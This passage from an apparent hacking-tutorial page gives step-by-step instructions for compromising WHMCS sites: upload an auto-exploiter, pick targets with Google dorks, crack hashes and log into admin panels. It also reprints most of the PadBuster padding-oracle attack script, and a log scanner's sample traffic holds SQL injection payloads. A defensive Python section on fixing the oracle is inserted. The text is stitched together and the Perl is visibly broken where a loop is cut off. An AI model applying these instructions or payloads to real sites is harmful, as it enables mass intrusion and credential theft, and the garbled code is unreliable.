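        for name, values in urllib.parse.parse_qs(body, keep_blank_values=True).items():
            params.setdefault(name, []).extend(values)
    return params


def scan_log(log_text: str) -> List[Finding]:
    """Scan a constructed tab-separated log: client, method, url, body ('-' if none)."""
    findings: List[Finding] = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        if not line.strip():
            continue
        _client, _method, url, body = line.split("\t")
        for field, values in fields_of(url, body).items():
            for value in values:
                text = normalize(value)
                for name, pattern in SIGNATURES:
                    if pattern.search(text):
                        findings.append(Finding(line_no, field, name))
    return findings


# Constructed sample traffic modelled on the URLs in the sections above.
SAMPLE_LOG = (
    "10.0.0.5\tGET\t/?fbconnect_action=myhome&fbuserid=2\t-\n"
    "10.0.0.5\tGET\t/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+"
    "1,2,3,4,5,concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12+from+wp_users--\t-\n"
    "10.0.0.9\tGET\t/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11\t-\n"
    "10.0.0.9\tGET\t/search.php?q=foo%27%3B%20select%20pg_sleep(10)--\t-\n"
    "10.0.0.12\tPOST\t/client/submitticket.php\t"
    "name=bob&email=bob%40example.com&subject=%7Bphp%7Decho+1%3B%7B/php%7D&message=hi\n"
    "10.0.0.12\tPOST\t/client/submitticket.php\t"
    "name=ann&email=ann%40example.com&subject=Invoice+question&message=hello\n"
)

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: field '{f.field}' matches {f.signature}")
```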

WHMCS Auto Exploiter

Take the WHMCS auto exploiter PHP script. Upload it to some PHP server.

In Google Dork make your own dork and click exploit, like:

Dorks:

inurl:submitticket.php site:.com
inurl:submitticket.php site:.net
inurl:submitticket.php site:.us
inurl:submitticket.php site:.eu
inurl:submitticket.php site:.org
inurl:submitticket.php site:.uk
intext:Powered by WHMCompleteSolution
intext:Powered by WHMCompleteSolution inurl:clientarea.php
inurl:announcements.php intext:WHMCompleteSolution
intext:Powered by WHMCS

Crack the hash. Go to the site, open the admin panel and log in.

Oracle Padding Attack Using Burp Suite

Requirements:

Microsoft SQL Server 2008 R2
Burp Suite Professional v1.4.07
exe.bat [ Save it in notepad and rename as exe.bat ]
@echo off
cmd

padBuster.pl [ Save it in notepad and rename as padBuster.pl ]

#!/usr/bin/perl
#
# PadBuster v0.3.3 - Automated script for performing Padding Oracle attacks
# Brian Holyfield - Gotham Digital Science ([email protected])
#
# Credits to J.Rizzo and T.Duong for providing proof of concept web exploit
# techniques and S.Vaudenay for initial discovery of the attack. Credits also
# to James M. Martin ([email protected]) for sharing proof of concept exploit
# code for performing various brute force attack techniques, and wireghoul (Eldar
# Marcussen) for making code quality improvements.
#

use LWP::UserAgent;
use strict;
use warnings;
use Getopt::Std;
use MIME::Base64;
use URI::Escape;
use Getopt::Long;
use Time::HiRes qw( gettimeofday );
use Compress::Zlib;
use Crypt::SSLeay;

# Set defaults with $variable = value
my $logFiles;
my $post;
my $encoding = 0;
my $headers;
my $cookie;
my $error;
my $prefix;
my $intermediaryInput;
my $cipherInput;
my $plainTextInput;
my $encodedPlainTextInput;
my $noEncodeOption;
my $superVerbose;
my $proxy;
my $proxyAuth;
my $noIv;
my $auth;
my $resumeBlock;
my $interactive = 0;
my $bruteForce;
my $ignoreContent;
my $useBody;
my $verbose;

GetOptions( "log" => \$logFiles,
            "post=s" => \$post,
            "encoding=s" => \$encoding,
            "headers=s" => \$headers,
            "cookies=s" => \$cookie,
            "error=s" => \$error,
            "prefix=s" => \$prefix,
            "intermediate=s" => \$intermediaryInput,
            "ciphertext=s" => \$cipherInput,
            "plaintext=s" => \$plainTextInput,
            "encodedtext=s" => \$encodedPlainTextInput,
            "noencode" => \$noEncodeOption,
            "veryverbose" => \$superVerbose,
            "proxy=s" => \$proxy,
            "proxyauth=s" => \$proxyAuth,
            "noiv" => \$noIv,
            "auth=s" => \$auth,
            "resume=s" => \$resumeBlock,
            "interactive" => \$interactive,
            "bruteforce" => \$bruteForce,
            "ignorecontent" => \$ignoreContent,
            "usebody" => \$useBody,
            "verbose" => \$verbose);

print "\n+-------------------------------------------+\n";
print "| PadBuster - v0.3.3                        |\n";
print "| Brian Holyfield - Gotham Digital Science  |\n";
print "| labs\@gdssecurity.com                      |\n";
print "+-------------------------------------------+\n";

if ($#ARGV < 2) {
 die "    Use: padBuster.pl URL EncryptedSample BlockSize [options]

  Where: URL = The target URL (and query string if applicable)
         EncryptedSample = The encrypted value you want to test. Must also
                           be present in the URL, PostData or a Cookie
         BlockSize = The block size being used by the algorithm

Options:
         -auth [username:password]: HTTP Basic Authentication
         -bruteforce: Perform brute force against the first block
         -ciphertext [Bytes]: CipherText for Intermediate Bytes (Hex-Encoded)
         -cookies [HTTP Cookies]: Cookies (name1=value1; name2=value2)
         -encoding [0-4]: Encoding Format of Sample (Default 0)
                          0=Base64, 1=Lower HEX, 2=Upper HEX
                          3=.NET UrlToken, 4=WebSafe Base64
         -encodedtext [Encoded String]: Data to Encrypt (Encoded)
         -error [Error String]: Padding Error Message
         -headers [HTTP Headers]: Custom Headers (name1::value1;name2::value2)
         -interactive: Prompt for confirmation on decrypted bytes
         -intermediate [Bytes]: Intermediate Bytes for CipherText (Hex-Encoded)
         -log: Generate log files (creates folder PadBuster.DDMMYY)
         -noencode: Do not URL-encode the payload (encoded by default)
         -noiv: Sample does not include IV (decrypt first block)
         -plaintext [String]: Plain-Text to Encrypt
         -post [Post Data]: HTTP Post Data String
         -prefix [Prefix]: Prefix bytes to append to each sample (Encoded)
         -proxy [address:port]: Use HTTP/S Proxy
         -proxyauth [username:password]: Proxy Authentication
         -resume [Block Number]: Resume at this block number
         -usebody: Use response body content for response analysis phase
         -verbose: Be Verbose
         -veryverbose: Be Very Verbose (Debug Only)
";
}

# Ok, if we've made it this far we are ready to begin..
my $url = $ARGV[0];
my $sample = $ARGV[1];
my $blockSize = $ARGV[2];

if ($url eq "" || $sample eq "" || $blockSize eq "") {
 print "\nERROR: The URL, EncryptedSample and BlockSize cannot be null.\n";
 exit();
}

# Hard Coded Inputs
#$post = "";
#$sample = "";

my $method = $post ? "POST" : "GET";

# These are file related variables
my $dirName = "PadBuster." . &getTime("F");
my $dirSlash = "/";
my $dirCmd = "mkdir ";
if (defined($ENV{'OS'})) {
 if ($ENV{OS} =~ /Windows/) {
  $dirSlash = "\\";
  $dirCmd = "md ";
 }
}
my $dirExists = 0;
my $printStats = 0;
my $requestTracker = 0;
my $timeTracker = 0;

if ($encoding < 0 || $encoding > 4) {
 print "\nERROR: Encoding must be a value between 0 and 4\n";
 exit();
}
my $encodingFormat = $encoding ? $encoding : 0;

my $encryptedBytes = $sample;
my $totalRequests = 0;

# See if the sample needs to be URL decoded, otherwise don't (the plus from B64 will be a problem)
if ($sample =~ /\%/) {
 $encryptedBytes = &uri_unescape($encryptedBytes)
}

# Prep the sample for regex use
$sample = quotemeta $sample;

# Now decode
$encryptedBytes = &myDecode($encryptedBytes, $encodingFormat);
if ( (length($encryptedBytes) % $blockSize) > 0) {
 print "\nERROR: Encrypted Bytes must be evenly divisible by Block Size ($blockSize)\n";
 print "       Encrypted sample length is ".int(length($encryptedBytes)).". Double check the Encoding and Block Size.\n";
 exit();
}

# If no IV, then append nulls as the IV (only if decrypting)
if ($noIv && !$bruteForce && !$plainTextInput) {
 $encryptedBytes = "\x00" x $blockSize . $encryptedBytes;
}

# PlainTextBytes is where the complete decrypted sample will be stored (decrypt only)
my $plainTextBytes;

# This is a bool to make sure we know where to replace the sample string
my $wasSampleFound = 0;

# ForgedBytes is where the complete forged sample will be stored (encrypt only)
my $forgedBytes;

# Isolate the IV into a separate byte array
my $ivBytes = substr($encryptedBytes, 0, $blockSize);

# Declare some optional elements for storing the results of the first test iteration
# to help the user if they don't know what the padding error looks like
my @oracleCantidates;
my $oracleSignature = "";
my %oracleGuesses;
my %responseFileBuffer;

# The block count should be the sample divided by the blocksize
my $blockCount = int(length($encryptedBytes)) / int($blockSize);

if (!$bruteForce && !$plainTextInput && $blockCount < 2) {
 print "\nERROR: There is only one block. Try again using the -noiv option.\n";
 exit();
}

# The attack works by sending in a real cipher text block along with a fake block in front of it
# You only ever need to send two blocks at a time (one real one fake) and just work through
# the sample one block at a time

# First, re-issue the original request to let the user know if something is potentially broken
my ($status, $content, $location, $contentLength) = &makeRequest($method, $url, $post, $cookie);

&myPrint("\nINFO: The original request returned the following",0);
&myPrint("[+] Status: $status",0);
&myPrint("[+] Location: $location",0);
&myPrint("[+] Content Length: $contentLength\n",0);
&myPrint("[+] Response: $content\n",1);

$plainTextInput = &myDecode($encodedPlainTextInput,$encodingFormat) if $encodedPlainTextInput;

if ($bruteForce) {
    &myPrint("INFO: Starting PadBuster Brute Force Mode",0);
    my $bfAttempts = 0;
    print "INFO: Resuming previous brute force at attempt $resumeBlock\n" if $resumeBlock;

    # Only loop through the first 3 bytes...this should be enough as it
    # requires 16.5M+ requests
    my @bfSamples;
    my $sampleString = "\x00" x 2;
    for my $c (0 ... 255) {
        substr($sampleString, 0, 1, chr($c));
        for my $d (0 ... 255) {
            substr($sampleString, 1, 1, chr($d));
            push (@bfSamples, $sampleString);
        }
    }

    foreach my $testVal (@bfSamples) {
        my $complete = 0;
        while ($complete == 0) {
            my $repeat = 0;
            for my $b (0 ... 255) {
                $bfAttempts++;
                if ( $resumeBlock && ($bfAttempts < ($resumeBlock - ($resumeBlock % 256)+1)) ) {
                    #SKIP
                } else {
                    my $testBytes = chr($b).$testVal;
                    $testBytes .= "\x00" x ($blockSize-3);

                    my $combinedBf = $testBytes;
                    $combinedBf .= $encryptedBytes;
                    $combinedBf = &myEncode($combinedBf, $encoding);

                    # Add the Query String to the URL
                    my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedBf);

                    # Issue the request
                    my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies);

                    my $signatureData = "$status\t$contentLength\t$location";
                    $signatureData = "$status\t$contentLength\t$location\t$content" if $useBody;

                    if ($oracleSignature eq "") {
                        &myPrint("[+] Starting response analysis...\n",0) if ($b == 0);
                        $oracleGuesses{$signatureData}++;
                        $responseFileBuffer{$signatureData} = "Status: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content";
                        if ($b == 255) {
                            &myPrint("*** Response Analysis Complete ***\n",0);
                            &determineSignature();
                            $printStats = 1;
                            $timeTracker = 0;
                            $requestTracker = 0;
                            $repeat = 1;
                            $bfAttempts = 0;
                        }
                    }
                    if ($oracleSignature ne "" && $oracleSignature ne $signatureData) {
                        &myPrint("\nAttempt $bfAttempts - Status: $status - Content Length: $contentLength\n$testUrl\n",0);
                        &writeFile("Brute_Force_Attempt_".$bfAttempts.".txt", "URL: $testUrl\nPost Data: $testPost\nCookies: $testCookies\n\nStatus: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content");
                    }
                }
            }
            ($repeat == 1) ? ($complete = 0) : ($complete = 1);
        }
    }
} elsif ($plainTextInput) {
    # ENCRYPT MODE
    &myPrint("INFO: Starting PadBuster Encrypt Mode",0);

    # The block count will be the plaintext divided by blocksize (rounded up)
    my $blockCount = int(((length($plainTextInput)+1)/$blockSize)+0.99);
    &myPrint("[+] Number of Blocks: ".$blockCount."\n",0);
    my $padCount = ($blockSize * $blockCount) - length($plainTextInput);
    $plainTextInput .= chr($padCount) x $padCount;

    # SampleBytes is the encrypted text you want to derive intermediate values for, so
    # copy the current ciphertext block into sampleBytes
    # Note, nulls are used if not provided and the intermediate values are brute forced
    $forgedBytes = $cipherInput ? &myDecode($cipherInput,1) : "\x00" x $blockSize;
    my $sampleBytes = $forgedBytes;
    for (my $blockNum = $blockCount; $blockNum > 0; $blockNum--) {
        # IntermediaryBytes is where the intermediate bytes produced by the algorithm are stored
        my $intermediaryBytes;
        if ($intermediaryInput && $blockNum == $blockCount) {
            $intermediaryBytes = &myDecode($intermediaryInput,2);
        } else {
            $intermediaryBytes = &processBlock($sampleBytes);
        }

        # Now XOR the intermediate bytes with the corresponding bytes from the plain-text block
        # This will become the next ciphertext block (or IV if the last one)
        $sampleBytes = $intermediaryBytes ^ substr($plainTextInput, (($blockNum-1) * $blockSize), $blockSize);
        $forgedBytes = $sampleBytes.$forgedBytes;
        &myPrint("\nBlock ".($blockNum)." Results:",0);
        &myPrint("[+] New Cipher Text (HEX): ".&myEncode($sampleBytes,1),0);
        &myPrint("[+] Intermediate Bytes (HEX): ".&myEncode($intermediaryBytes,1)."\n",0);
    }
    $forgedBytes = &myEncode($forgedBytes, $encoding);
    chomp($forgedBytes);
} else {
    # DECRYPT MODE
    &myPrint("INFO: Starting PadBuster Decrypt Mode",0);
    if ($resumeBlock) {
        &myPrint("INFO: Resuming previous exploit at Block $resumeBlock\n",0);
    } else {
        $resumeBlock = 1;
    }

    # Assume that the IV is included in our sample and that the first block is the IV
    for (my $blockNum = ($resumeBlock+1); $blockNum = 0; $byteNum--) {
    INNERLOOP:
    for (my $i = 255; $i >= 0; $i--) {
        # Fuzz the test byte
        substr($testBytes, $byteNum, 1, chr($i));

        # Combine the test bytes and the sample
        my $combinedTestBytes = $testBytes.$sampleBytes;

        if ($prefix) {
            $combinedTestBytes = &myDecode($prefix,$encodingFormat).$combinedTestBytes;
        }

        $combinedTestBytes = &myEncode($combinedTestBytes, $encodingFormat);
        chomp($combinedTestBytes);

        if (! $noEncodeOption) {
            $combinedTestBytes = &uri_escape($combinedTestBytes);
        }

        my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedTestBytes);

        # Ok, now make the request
        my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies);

        my $signatureData = "$status\t$contentLength\t$location";
        $signatureData = "$status\t$contentLength\t$location\t$content" if $useBody;

        # If this is the first block and there is no padding error message defined, then cycle through
        # all possible requests and let the user decide what the padding error behavior is.
        if ($analysisMode == 0) {
            &myPrint("INFO: No error string was provided...starting response analysis\n",0) if ($i == 255);
            $oracleGuesses{$signatureData}++;
            $responseFileBuffer{$signatureData} = "URL: $testUrl\nPost Data: $testPost\nCookies: $testCookies\n\nStatus: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content";
            if ($byteNum == $blockSize - 1 && $i == 0) {
                &myPrint("*** Response Analysis Complete ***\n",0);
                &determineSignature();
                $analysisMode = 1;
                $repeat = 1;
                last OUTERLOOP;
            }
        }

        my $continue = "y";

        if (($error && $content !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) {
            # This is for autoretry logic (only works on the first byte)
            if ($autoRetry == 1 && ($byteNum == ($blockSize - 1) ) && $hasHit == 0 ) {
                $hasHit++;
            } else {
                # If there was no padding error, then it worked
                &myPrint("[+] Success: (".abs($i-256)."/256) [Byte ".($byteNum+1)."]",0);
                &myPrint("[+] Test Byte:".&uri_escape(substr($testBytes, $byteNum, 1)),1);

                # If continually getting a hit on attempt zero, then something is probably wrong
                $falsePositiveDetector++ if ($i == 255);

                if ($interactive == 1) {
                    $continue = &promptUser("Do you want to use this value (Yes/No/All)? [y/n/a]","",1);
                }

                if ($continue eq "y" || $continue eq "a") {
                    $interactive = 0 if ($continue eq "a");

                    # Next, calculate the decrypted byte by XORing it with the padding value
                    my ($currentPaddingByte, $nextPaddingByte);

                    # These variables could allow for flexible padding schemes (for now PKCS)
                    # For PKCS#7, the padding byte is equal to chr($blockSize - $byteNum)
                    $currentPaddingByte = chr($blockSize - $byteNum);
                    $nextPaddingByte = chr($blockSize - $byteNum + 1);

                    my $decryptedByte = substr($testBytes, $byteNum, 1) ^ $currentPaddingByte;
                    &myPrint("[+] XORing with Padding Char, which is ".&uri_escape($currentPaddingByte),1);

                    $returnValue = $decryptedByte.$returnValue;
                    &myPrint("[+] Decrypted Byte is: ".&uri_escape($decryptedByte),1);

                    # Finally, update the test bytes in preparation for the next round, based on the padding used
                    for (my $k = $byteNum; $k < $blockSize; $k++) {
                        # First, XOR the current test byte with the padding value for this round to recover the decrypted byte
                        substr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $currentPaddingByte));

                        # Then, XOR it again with the padding byte for the next round
                        substr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $nextPaddingByte));
                    }
                    last INNERLOOP;
                }
            }
        }

        ## TODO: Combine these two blocks?
        if ($i == 0 && $analysisMode == 1) {
            # End of the road with no success. We should probably try again.
            &myPrint("ERROR: No matching response on [Byte ".($byteNum+1)."]",0);

            if ($autoRetry == 0) {
                $autoRetry = 1;
                &myPrint("       Automatically trying one more time...",0);
                $repeat = 1;
                last OUTERLOOP;
            } else {
                if (($byteNum == $blockSize - 1) && ($error)) {
                    &myPrint("\nAre you sure you specified the correct error string?",0);
                    &myPrint("Try re-running without the -e option to perform a response analysis.\n",0);
                }

                $continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1);
                if ($continue ne "n") {
                    &myPrint("INFO: Switching to interactive mode",0);
                    $interactive = 1;
                    $repeat = 1;
                    last OUTERLOOP;
                }
            }
        }

        if ($falsePositiveDetector == $blockSize) {
            &myPrint("\n*** ERROR: It appears there are false positive results. ***\n",0);
            &myPrint("HINT: The most likely cause for this is an incorrect error string.\n",0);
            if ($error) {
                &myPrint("[+] Check the error string you provided and try again, or consider running",0);
                &myPrint("[+] without an error string to perform an automated response analysis.\n",0);
            } else {
                &myPrint("[+] You may want to consider defining a custom padding error string",0);
                &myPrint("[+] instead of the automated response analysis.\n",0);
            }
            $continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1);
            if ($continue eq "y") {
                &myPrint("INFO: Switching to interactive mode",0);
                $interactive = 1;
                $repeat = 1;
                last OUTERLOOP;
            }
        }
    }
    }
    ($repeat == 1) ? ($complete = 0) : ($complete = 1);
    }
    return $returnValue;
}
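The padding arithmetic in processBlock above (XOR the accepted test byte with the current pad value, then re-XOR for the next round) only works because the server answers a malformed pad differently from anything else. The Python below is an added example, not PadBuster's code and not part of this page's original text: it puts that server-side root cause next to the fix. The Feistel block cipher, the fixed keys and the `user=alice` message are constructed for the demo (AES would be the real choice, but this runs on the standard library alone); the fix is encrypt-then-MAC with a constant-time tag check before any decryption and one generic error for every failure, so there is no padding-error signature left for a response analysis to find.

```python
import hashlib
import hmac
import os

BLOCK = 16

# Constructed stand-in for AES so the example runs on the standard library alone: a
# 4-round Feistel network (HMAC-SHA256 round function) is a keyed, invertible 16-byte
# permutation, which is all CBC needs to make the oracle observable. Not a real cipher.
def _round(key, rnd, half):
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _round(key, rnd, r))
    return l + r

def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _round(key, rnd, l)), l
    return l + r

def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data):
    n = data[-1]  # raises on malformed padding; whether the caller leaks that is the issue
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, padded):
    iv = os.urandom(BLOCK)
    prev, out = iv, b""
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return iv + out  # IV travels as the first block, as PadBuster assumes

def cbc_decrypt_raw(key, data):
    prev, out = data[:BLOCK], b""
    for i in range(BLOCK, len(data), BLOCK):
        out += _xor(block_decrypt(key, data[i:i + BLOCK]), prev)
        prev = data[i:i + BLOCK]
    return out  # still padded

def vulnerable_server(key, token):
    # Unauthenticated CBC: padding failures and content failures get different
    # responses, which is exactly the signature a response analysis looks for.
    try:
        plain = pkcs7_unpad(cbc_decrypt_raw(key, token))
    except ValueError:
        return 500, "padding error"
    if not plain.startswith(b"user="):
        return 400, "malformed session"
    return 200, "ok"

def seal(enc_key, mac_key, plaintext):
    body = cbc_encrypt(enc_key, pkcs7_pad(plaintext))
    return body + hmac.new(mac_key, body, hashlib.sha256).digest()

def hardened_server(enc_key, mac_key, token):
    # Encrypt-then-MAC: constant-time tag check before any decryption, so tampered
    # ciphertext never reaches the padding check, and one generic answer for every failure.
    body, tag = token[:-32], token[-32:]
    if len(body) < 2 * BLOCK or len(body) % BLOCK:
        return 400, "invalid token"
    if not hmac.compare_digest(hmac.new(mac_key, body, hashlib.sha256).digest(), tag):
        return 400, "invalid token"
    try:
        plain = pkcs7_unpad(cbc_decrypt_raw(enc_key, body))
    except ValueError:
        return 400, "invalid token"
    if not plain.startswith(b"user="):
        return 400, "invalid token"
    return 200, "ok"

def demo():
    # Constructed keys/message. Flipping the last IV byte changes only the last
    # plaintext byte, so the padding can be made invalid (0x10) or valid (0x01) on purpose.
    enc_key, mac_key = b"k" * 32, b"m" * 32
    msg = b"user=alice"  # pads to 16 bytes with six 0x06 bytes
    plain_token = cbc_encrypt(enc_key, pkcs7_pad(msg))
    sealed_token = seal(enc_key, mac_key, msg)

    def flip(token, x):
        return token[:BLOCK - 1] + bytes([token[BLOCK - 1] ^ x]) + token[BLOCK:]

    bad_pad, ok_pad = 0x06 ^ 0x10, 0x06 ^ 0x01
    return {
        "vulnerable": tuple(vulnerable_server(enc_key, t)[0] for t in
                            (plain_token, flip(plain_token, bad_pad), flip(plain_token, ok_pad))),
        "hardened": tuple(hardened_server(enc_key, mac_key, t)[0] for t in
                          (sealed_token, flip(sealed_token, bad_pad), flip(sealed_token, ok_pad))),
    }
```

demo() returns the status codes each server gives for an intact token and for the two tampered ones: the vulnerable server tells the two tampers apart (500 versus 200), which is the distinguishing response the Perl above keys on, while the hardened server answers 400 to both. The same three-request differential, run against an endpoint's real responses, is a quick way for a defender to confirm that a fix actually removed the oracle rather than just changing the error text.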

sub makeRequest {
    my ($method, $url, $data, $cookie) = @_;
    my ($noConnect, $lwp, $status, $content, $req, $location, $contentLength);
    my $numRetries = 0;
    $data = '' unless $data;
    $cookie = '' unless $cookie;

    $requestTracker++;
    do {
        # Quick hack to avoid hostname in URL when using a proxy with SSL (this will get re-set later if needed)
        $ENV{HTTPS_PROXY} = "";
        $lwp = LWP::UserAgent->new(env_proxy => 1, keep_alive => 1, timeout => 30, requests_redirectable => [], );
        $req = new HTTP::Request $method => $url;

        &myPrint("Request:\n$method\n$url\n$data\n$cookie",0) if $superVerbose;

        # Add request content for POST and PUTS
        if ($data) {
            $req->content_type('application/x-www-form-urlencoded');
            $req->content($data);
        }

        if ($proxy) {
            my $proxyUrl = "http://";
            if ($proxyAuth) {
                my ($proxyUser, $proxyPass) = split(":",$proxyAuth);
                $ENV{HTTPS_PROXY_USERNAME} = $proxyUser;
                $ENV{HTTPS_PROXY_PASSWORD} = $proxyPass;
                $proxyUrl .= $proxyAuth."@";
            }
            $proxyUrl .= $proxy;
            $lwp->proxy(['http'], "http://".$proxy);
            $ENV{HTTPS_PROXY} = "http://".$proxy;
        }

        if ($auth) {
            my ($httpuser, $httppass) = split(/:/,$auth);
            $req->authorization_basic($httpuser, $httppass);
        }

        # If cookies are defined, add a COOKIE header
        if ($cookie ne "") {
            $req->header(Cookie => $cookie);
        }

        if ($headers) {
            # Custom headers are given as name::value pairs separated by ";" (the -headers option)
            my @customHeaders = split(/;/i,$headers);
            for (my $i = 0; $i < scalar(@customHeaders); $i++) {
                my ($headerName, $headerVal) = split(/::/, $customHeaders[$i]);
                $req->header($headerName, $headerVal);
            }
        }

        my $startTime = &gettimeofday();
        my $response = $lwp->request($req);
        my $endTime = &gettimeofday();
        $timeTracker = $timeTracker + ($endTime - $startTime);

        if ($printStats == 1 && $requestTracker % 250 == 0) {
            # $timeTracker is reset every 250 requests, so the average is over 250
            print "[+] $requestTracker Requests Issued (Avg Request Time: ".(sprintf "%.3f", $timeTracker/250).")\n";
            $timeTracker = 0;
        }

        # Extract the required attributes from the response
        $status = substr($response->status_line, 0, 3);
        $content = $response->content;
        &myPrint("Response Content:\n$content",0) if $superVerbose;
        $location = $response->header("Location");
        if (!$location) {
            $location = "N/A";
        }
        #$contentLength = $response->header("Content-Length");
        $contentLength = length($content);

        my $contentEncoding = $response->header("Content-Encoding");
        if ($contentEncoding) {
            if ($contentEncoding =~ /GZIP/i ) {
                $content = Compress::Zlib::memGunzip($content);
                $contentLength = length($content);
            }
        }

        my $statusMsg = $response->status_line;
        #myPrint("Status: $statusMsg, Location: $location, Length: $contentLength",1);
        if ($statusMsg =~ /Can't connect/) {
            print "ERROR: $statusMsg\n   Retrying in 10 seconds...\n\n";
            $noConnect = 1;
            $numRetries++;
            sleep 10;
        } else {
            $noConnect = 0;
            $totalRequests++;
        }
    } until (($noConnect == 0) || ($numRetries >= 15));

    if ($numRetries >= 15) {
        &myPrint("ERROR: Number of retries has exceeded 15 attempts...quitting.\n",0);
        exit;
    }
    return ($status, $content, $location, $contentLength);
}

sub myPrint {
    my ($printData, $printLevel) = @_;
    $printData .= "\n";
    if (($verbose && $printLevel > 0) || $printLevel < 1 || $superVerbose) {
        print $printData;
        &writeFile("ActivityLog.txt",$printData);
    }
}

sub myEncode {
    my ($toEncode, $format) = @_;
    return &encodeDecode($toEncode, 0, $format);
}

sub myDecode {
    my ($toDecode, $format) = @_;
    return &encodeDecode($toDecode, 1, $format);
}

sub encodeDecode {
    my ($toEncodeDecode, $oper, $format) = @_;
    # Oper: 0=Encode, 1=Decode
    # Format: 0=Base64, 1=Hex Lower, 2=Hex Upper, 3=NetUrlToken, 4=Web64
    my $returnVal = "";
    if ($format == 1 || $format == 2) {
        # HEX
        if ($oper == 1) {
            # Decode (always convert to lower when decoding)
            $toEncodeDecode = lc($toEncodeDecode);
            $returnVal = pack("H*",$toEncodeDecode);
        } else {
            # Encode
            $returnVal = unpack("H*",$toEncodeDecode);
            if ($format == 2) {
                # Uppercase
                $returnVal = uc($returnVal);
            }
        }
    } elsif ($format == 3) {
        # NetUrlToken
        if ($oper == 1) {
            $returnVal = &web64Decode($toEncodeDecode,1);
        } else {
            $returnVal = &web64Encode($toEncodeDecode,1);
        }
    } elsif ($format == 4) {
        # Web64
        if ($oper == 1) {
            $returnVal = &web64Decode($toEncodeDecode,0);
        } else {
            $returnVal = &web64Encode($toEncodeDecode,0);
        }
    } else {
        # B64
        if ($oper == 1) {
            $returnVal = &decode_base64($toEncodeDecode);
        } else {
            $returnVal = &encode_base64($toEncodeDecode);
            $returnVal =~ s/(\r|\n)//g;
        }
    }
    return $returnVal;
}

sub web64Encode {
    my ($input, $net) = @_;
    # net: 0=No Padding Number, 1=Padding (NetUrlToken)
    # URL-safe alphabet: "+" becomes "-", "/" becomes "_", and for NetUrlToken the
    # stripped "=" characters are replaced by a trailing digit giving their count
    $input = &encode_base64($input);
    $input =~ s/(\r|\n)//g;
    $input =~ s/\+/\-/g;
    $input =~ s/\//\_/g;
    my $count = $input =~ s/\=//g;
    $count = 0 if ($count eq "");
    $input .= $count if ($net == 1);
    return $input;
}

sub web64Decode {
    my ($input, $net) = @_;
    # net: 0=No Padding Number, 1=Padding (NetUrlToken)
    $input =~ s/\-/\+/g;
    $input =~ s/\_/\//g;
    if ($net == 1) {
        # Last character is the number of "=" pad characters to restore
        my $count = chop($input);
        $input = $input.("=" x int($count));
    }
    return &decode_base64($input);
}

sub promptUser {
    my ($prompt, $default, $yn) = @_;
    my $defaultValue = $default ? "[$default]" : "";
    print "$prompt $defaultValue: ";
    chomp(my $input = <STDIN>);
    $input = $input ? $input : $default;
    if ($yn) {
        # Accept exactly one of y/n/a; anything else re-prompts (and its answer is returned)
        if ($input =~ /^[yna]$/) {
            return $input;
        } else {
            return &promptUser($prompt, $default, $yn);
        }
    } else {
        if ($input =~ /^-?\d/ && $input > 0 && $input < 256) {
            return $input;
        } else {
            return &promptUser($prompt, $default);
        }
    }
}

sub writeFile {
    my ($fileName, $fileContent) = @_;
    if ($logFiles) {
        if ($dirExists != 1) {
            system($dirCmd." ".$dirName);
            $dirExists = 1;
        }
        $fileName = $dirName.$dirSlash.$fileName;
        open(my $OUTFILE, '>>', $fileName) or die "ERROR: Can't write to file $fileName\n";
        print $OUTFILE $fileContent;
        close($OUTFILE);
    }
}

sub getTime {
    my ($format) = @_;
    my ($second, $minute, $hour, $day, $month, $year, $weekday, $dayofyear, $isDS